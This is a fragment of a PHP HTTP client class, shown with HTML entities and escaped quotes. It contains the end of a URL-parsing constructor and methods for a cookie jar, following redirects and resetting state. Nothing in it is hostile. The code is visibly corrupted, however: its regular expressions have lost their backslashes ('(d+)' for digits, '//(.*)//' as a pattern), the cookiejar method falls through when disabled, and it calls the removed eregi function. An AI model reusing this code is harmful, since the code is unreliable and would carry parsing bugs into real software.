		$array&nbsp;=&nbsp;explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg)));
		$this->host=$array[0];

		preg_match(\"/:(d+)//\",$urltarg,$matches);
		$this->port=empty($matches[1])&nbsp;?&nbsp;80&nbsp;:&nbsp;$matches[1];
		
		$temp&nbsp;=&nbsp;str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg));
		preg_match(\"//(.*)//\",$temp,$matches);
		$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");
	
		if($this->port&nbsp;>&nbsp;65535)&nbsp;die(\"Error:&nbsp;Invalid&nbsp;port&nbsp;number\");
	}
	
	
	/**
	&nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will
	&nbsp;*&nbsp;extract&nbsp;all&nbsp;\"Set-Cookie\"&nbsp;headers&nbsp;values
	&nbsp;*&nbsp;and&nbsp;it&nbsp;will&nbsp;automatically&nbsp;add&nbsp;them&nbsp;into&nbsp;the&nbsp;\"Cookie\"&nbsp;header
	&nbsp;*&nbsp;for&nbsp;all&nbsp;next&nbsp;requests.
	&nbsp;*
	&nbsp;*&nbsp;$this->cookiejar(1);&nbsp;//&nbsp;enabled
	&nbsp;*&nbsp;$this->cookiejar(0);&nbsp;//&nbsp;disabled
	&nbsp;*&nbsp;
	&nbsp;*/
	public&nbsp;function&nbsp;cookiejar($code)
	{
		if($code===0)&nbsp;$this->cookiejar=\'\';
		if($code===1)&nbsp;$this->cookiejar=1;
		else
		{
			$this->getcookie($code);
		}
	}


	/**
	&nbsp;*&nbsp;If&nbsp;you&nbsp;call&nbsp;this&nbsp;function,&nbsp;the&nbsp;script&nbsp;will
	&nbsp;*&nbsp;follow&nbsp;all&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server.
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->allowredirection(1);&nbsp;//&nbsp;enabled
	&nbsp;*&nbsp;$this->allowredirection(0);&nbsp;//&nbsp;disabled
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@return&nbsp;$this->get($locationresponse)
	&nbsp;*/
	public&nbsp;function&nbsp;allowredirection($code)
	{
		if($code===0)&nbsp;$this->allowredirection=\'\';
		if($code===1)&nbsp;$this->allowredirection=1;
		else
		{
			if(preg_match(\"/(location|content-location|uri):&nbsp;(.*)/i\",$code,$codearr))
			{
				$location&nbsp;=&nbsp;str_replace(chr(13),\'\',$codearr[2]);
				if(!eregi(\"://\",$location))
				{
					return&nbsp;$this->get(\"http://\".$this->host.$this->path.$location);
				}
				else
				{
					return&nbsp;$this->get($location);
				}
			}
			else
			{
				return&nbsp;$code;
			}
		}
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;reset&nbsp;some&nbsp;parameters:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->reset(header);&nbsp;//&nbsp;headers&nbsp;cleaned
	&nbsp;*&nbsp;$this->reset(cookie);&nbsp;//&nbsp;cookies&nbsp;cleaned
	&nbsp;*&nbsp;$this->reset();&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;clean&nbsp;all&nbsp;parameters
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$func
	&nbsp;*/
	public&nbsp;function&nbsp;reset($func=\'\')
	{
		switch($func)
		{
			case&nbsp;\"header\":
			$this->header=\'\';
			break;
			
			case&nbsp;\"cookie\":
			$this->cookie=\'\';
			break;
			
			default:
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookiejar=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->header=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->cookie=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->allowredirection=\'\';&nbsp;
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$this->agent=\'\';
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
		}
	}
}
?>

&nbsp;
JSON